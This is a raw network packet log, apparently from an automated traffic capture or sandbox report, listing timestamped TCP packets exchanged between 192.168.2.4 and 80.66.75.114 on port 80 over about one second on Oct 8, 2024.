                                                            Oct 8, 2024 10:08:41.812438011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812486887 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812501907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812517881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812534094 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812534094 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812551022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812581062 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812581062 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950417995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950440884 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950459003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950505972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950505972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950565100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950581074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950597048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950602055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950613022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950623989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950630903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950639009 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950654030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950666904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950742960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950759888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950774908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950779915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950792074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950795889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950807095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950809002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950823069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950824976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950836897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950839996 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950855970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950858116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950871944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950881958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950887918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.950900078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950915098 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.950926065 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951128960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951144934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951160908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951165915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951185942 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951200008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951411963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951450109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951486111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951502085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951522112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951535940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951606989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951623917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951647043 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951664925 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951668024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951683998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951703072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951716900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951885939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951900959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951919079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951922894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951936960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951939106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951955080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951968908 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.952088118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.952131033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.952202082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.952215910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.952236891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.952251911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182379007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182398081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182414055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182429075 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182432890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182445049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182459116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182459116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182460070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182475090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182482004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182502985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182513952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.224742889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.224839926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.224981070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.224994898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225008965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225024939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225034952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225039005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225054979 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225054979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225070000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225081921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225085020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225100994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225105047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225116968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225125074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225145102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225157022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225208044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225253105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225334883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225351095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225364923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225383997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225405931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225450039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225492954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225522995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225538015 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225553036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225564957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225580931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225598097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225667953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225683928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225699902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225713968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225737095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225887060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225929022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225954056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225970030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225994110 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226006985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226066113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226080894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226094961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226106882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226109982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226130962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226150036 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226176977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226217985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226257086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226273060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226288080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226298094 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226301908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226310968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226317883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226325035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226339102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226350069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226351976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226389885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226946115 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226960897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226977110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226986885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227000952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227009058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227051020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227066040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227080107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227092028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227096081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227109909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227123976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227137089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227284908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227299929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227313995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227324963 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227329016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227344036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227349997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227370024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227394104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.228744984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.228760004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.228774071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.228795052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.228811979 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.229049921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229063034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229077101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229094982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229100943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.229118109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.229130983 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.272892952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272907019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272922039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272937059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272974968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.273006916 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.314117908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.314182997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.314219952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.314268112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556070089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556088924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556106091 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556121111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556134939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556148052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556163073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556179047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556297064 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556304932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556312084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556304932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556304932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556328058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556344032 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556356907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556371927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556387901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556391954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556391954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556391954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556400061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556415081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556420088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556430101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556442976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556446075 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556463003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556479931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556499004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556685925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556700945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556715012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556727886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556741953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556747913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556754112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556768894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556768894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556782961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556787968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556794882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556807041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556808949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556827068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556843042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556863070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556874037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556888103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556917906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556926012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556932926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556946039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556960106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556967020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556974888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556988001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556989908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557004929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557007074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557019949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557034016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557049036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557049990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557049990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557065010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557077885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557080030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557079077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557095051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557097912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557111979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557122946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557122946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557142973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557161093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557508945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557523966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557538986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557554960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557564020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557569027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557583094 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557585001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557585955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557610989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557610989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557634115 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561336994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561393976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561399937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561408043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561449051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561449051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561492920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561507940 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561522961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561538935 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561546087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561570883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561570883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561600924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561657906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561672926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561687946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561702967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561709881 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561742067 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561758041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.561814070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561830044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.561872959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.637824059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.637840033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.637855053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638031006 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638106108 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638120890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638135910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638159990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638161898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638175011 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638189077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638191938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638206005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638219118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638220072 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638219118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638235092 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638240099 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638251066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638261080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638261080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638264894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638283014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638288975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638303995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638303995 CEST4973080192.168.2.480.66.75.114
